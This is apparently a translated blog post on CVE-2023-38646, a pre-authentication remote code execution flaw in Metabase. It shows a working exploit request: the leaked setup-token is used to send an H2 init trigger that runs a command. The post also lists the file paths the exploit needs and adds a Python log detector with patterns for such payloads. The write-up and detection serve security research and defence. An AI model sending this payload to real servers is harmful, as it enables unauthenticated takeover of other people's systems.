
CVE-2023-38646 Metabase pre-auth rce

source link: https://y4er.com/posts/cve-2023-38646-metabase-pre-auth-rce/


2023-07-26  2023-07-26  about 393 words  estimated reading time 1 minute
This article was last updated on 2023-07-26; its content may be out of date.

Two versions of the jar:

https://downloads.metabase.com/v0.46.6.1/metabase.jar
https://downloads.metabase.com/v0.46.6/metabase.jar

Requires JDK 11.

During setup, an H2 JDBC connection can be used as the database.


Capturing traffic during setup shows a request to http://192.168.1.178:3000/api/session/properties whose response contains a setup-token field.

That field is exactly what is needed to configure the H2 JDBC connection, so the result is an unauthenticated RCE.

POST /api/setup/validate HTTP/1.1
Host: 192.168.1.178:3000
Content-Length: 451
Accept: application/json
Content-Type: application/json
Cookie: metabase.DEVICE=009e2f5a-8eea-45b0-8d2d-1fafb2ee475f
Connection: close

{
    "token": "41cc5e8c-d06f-4a3d-8f84-5133323b34d8",
    "details": {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules": {},
        "details": {
            "db": "file:./metabase.db;",
            "advanced-options": true,
            "ssl": true,
            "init": "CREATE TRIGGER asd BEFORE SELECT ON INFORMATION_SCHEMA.tables AS '//javascript\njava.lang.Runtime.getRuntime().exec(\"calc\")'"
        },
        "name": "a1",
        "engine": "h2"
    }
}

The annoying part is that the JDBC URL gets IFEXISTS=TRUE appended by default, so the database file must already exist, and its name must be of the form xxx.mv.db.

The file path differs depending on how Metabase is deployed:

In Docker: /metabase.db/metabase.db.mv.db

Started directly from the jar: ./metabase.db.mv.db

Besides metabase.db, /plugins/sample-database.db.mv.db also works, although some Docker versions do not ship it.
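For defenders, the request above gives a concrete detection signal: a POST to /api/setup/validate that selects the h2 engine and carries an H2 init script (either the init key shown above or an INIT= parameter embedded in the JDBC URL) should never appear in normal traffic. The following is an added example, not code from the original post or from Metabase, that runs that check over constructed access-log records; the record layout (src, method, path, body) is an assumption, and the token values are placeholders.

```python
import json
import re

# Constructed sample records in the shape of a reverse-proxy access log that
# also captures request bodies. These are not real Metabase logs.
SAMPLE_RECORDS = [
    {
        "src": "10.0.0.5",
        "method": "POST",
        "path": "/api/setup/validate",
        "body": json.dumps({
            "token": "00000000-0000-0000-0000-000000000000",  # placeholder
            "details": {
                "engine": "postgres",
                "details": {"host": "db.internal", "dbname": "metabase"},
            },
        }),
    },
    {
        "src": "203.0.113.7",
        "method": "POST",
        "path": "/api/setup/validate",
        "body": json.dumps({
            "token": "00000000-0000-0000-0000-000000000000",  # placeholder
            "details": {
                "engine": "h2",
                "details": {
                    "db": "file:./metabase.db;",
                    "init": "CREATE TRIGGER t BEFORE SELECT ON "
                            "INFORMATION_SCHEMA.tables AS '//javascript\\n...'",
                },
            },
        }),
    },
    {"src": "10.0.0.9", "method": "GET", "path": "/api/session/properties", "body": ""},
]

# Statements an H2 init script should never contain when it arrives through
# the unauthenticated setup endpoint (H2 can run Java/JavaScript from these).
SUSPICIOUS_SQL = re.compile(
    r"(?i)\b(CREATE\s+TRIGGER|CREATE\s+ALIAS|RUNSCRIPT)\b|//javascript"
)


def h2_init_sources(conn_details):
    """Return every place an H2 init script can be supplied: the explicit
    'init' connection property and an INIT= parameter inside the JDBC URL."""
    sources = []
    init = conn_details.get("init")
    if isinstance(init, str) and init.strip():
        sources.append(("init", init))
    db = conn_details.get("db", "")
    if isinstance(db, str):
        for match in re.finditer(r"(?i)INIT=([^;]*)", db):
            sources.append(("db", match.group(1)))
    return sources


def analyze_record(record):
    """Return a finding dict for a suspicious setup/validate call, else None."""
    if record.get("method") != "POST" or record.get("path") != "/api/setup/validate":
        return None
    try:
        body = json.loads(record.get("body") or "{}")
    except json.JSONDecodeError:
        return {"src": record.get("src"), "severity": "low",
                "reason": "unparseable JSON body on setup endpoint"}
    details = body.get("details") or {}
    if str(details.get("engine", "")).lower() != "h2":
        return None
    sources = h2_init_sources(details.get("details") or {})
    if not sources:
        severity, reason = "medium", "h2 engine selected via setup endpoint"
    elif any(SUSPICIOUS_SQL.search(script) for _, script in sources):
        severity, reason = "high", "h2 init script with trigger/alias/runscript"
    else:
        severity, reason = "medium", "h2 init script present"
    return {"src": record.get("src"), "severity": severity, "reason": reason}


def analyze_records(records):
    """Run the check over a batch of records and keep only the findings."""
    return [f for f in (analyze_record(r) for r in records) if f]


if __name__ == "__main__":
    for finding in analyze_records(SAMPLE_RECORDS):
        print(finding)
```

Any hit on the h2 engine from this endpoint is worth an alert on its own, since the setup flow is only expected to run once; the init-script check just raises the priority. The same logic can be pointed at a WAF or proxy body log, and an instance that still answers /api/setup/validate after setup is complete should be updated.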

My writing is poor, my wording flippant, the content shallow and the hands-on work clumsy. Corrections and pointers from the masters are welcome; many thanks.

